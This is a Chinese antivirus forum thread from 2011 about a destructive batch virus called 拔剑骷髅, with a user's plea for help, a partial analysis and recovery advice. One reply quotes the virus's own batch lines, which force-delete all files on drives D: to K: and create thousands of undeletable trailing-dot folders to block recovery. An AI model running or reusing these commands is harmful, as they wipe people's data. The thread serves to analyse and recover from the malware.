瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 中了拔剑骷髅
洒下啊下 - 2011-5-21 13:06:00
电脑中了拔剑骷髅病毒~~~~所有东西都给删掉了!咋办啊??
这文件夹没法格式化.删除.打开.===.重新装了系统还是一样的啊,所有文件都变成文件夹。打不开,删不掉。求大家,现在用公司的电脑求救.


用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
洒下啊下 - 2011-5-21 13:08:00
洒下啊下 - 2011-5-21 13:08:00
baohe - 2011-5-21 14:28:00
在哪儿中的?有病毒样本没?请作为附件发上来。

若没样本,通过短信给我个带毒的网址也行。
洒下啊下 - 2011-5-21 21:43:00
那台电脑无法进入系统了,不过网上有视频http://v.youku.com/v_show/id_XMjMzMzkwODY0.html
baohe - 2011-5-21 22:35:00


引用:
原帖由 洒下啊下 于 2011-5-21 21:43:00 发表
那台电脑无法进入系统了,不过网上有视频http://v.youku.com/v_show/id_XMjMzMzkwODY0.html



视频有啥用?要的是病毒程序,或者是带毒的网页。


没病毒样本,我无法发表意见。
夲號ヱ被ジ盜 - 2011-5-21 22:51:00
猫叔
不知道这个行不行

出处:
http://bbs.hsw.cn/read.php?tid=1501917

分段落整理后的在附件【可能有错误】


权限:100


其中有这两句:


@REM [ 攻击硬盘数据 ]
@del /f /s /q D:\*.* & del /f /s /q E:\*.* & del /f /s /q F:\*.* & del /f /s /q G:\*.* & del /f /s /q H:\*.* & del /f /s /q I:\*.* & del /f /s /q J:\*.* & del /f /s /q K:\*.*【后边省略】






@REM [ 插入垃圾目录到硬盘,阻碍数据恢复 ]
@if exist C:\拔剑※骷髅1000..\ goto da
@for /l %%i in (1 1 1000) do (md C:\拔剑※骷髅%%i..\ & md D:\繡氺¤崶錵%%i..\ & md E:\SEX女郎%%i..\ & md F:\黑网伏击会%%i..\ & md G:\DOS的威力%%i..\ & md H:\病毒钚牁怕%%i..\ & md I:\嚇死伱鞡箌%%i..\) :da

附件: 新建文本文档.txt
超级游戏迷 - 2011-5-23 11:39:00
纯破坏性病毒,删除所有驱动器下正常文件,建立带“.”字符的不可删除的歧义文件夹,并利用系统默认的自动播放和autorun.inf的关系反复感染和破坏计算机文档。

这病毒在VISTA以上操作系统下,可破坏计算机文档,但建立带“.”字符的不可删除的歧义文件夹应该不能成功。

恢复方法:
1、有出厂备份或GHOST备份的话,直接恢复C盘至出厂状态或正常备份,进系统后不要以任何方式访问除C盘以外的任何驱动器,直接格式化系统盘以外所有驱动器。
2、无备份的话,格式化C盘重装系统,进系统后不要以任何方式访问除C盘以外的任何驱动器,直接格式化系统盘以外所有驱动器。

猜测病毒作者发明此病毒的本意:
1、炫耀所掌握的DOS命令行能力;
2、破坏染毒计算机的正常文件。
过客2007 - 2011-5-24 15:21:00
:kaka12:

谢谢提供样本,收了。

里面可能有我需要的代码~~~
下属 - 2014-1-14 12:33:00
新手学习 感谢分享
昊情 - 2014-2-8 16:54:00
安全模式 进行杀毒
青春犹在 - 2016-2-21 20:12:00
:kaka5:
1
查看完整版本: 中了拔剑骷髅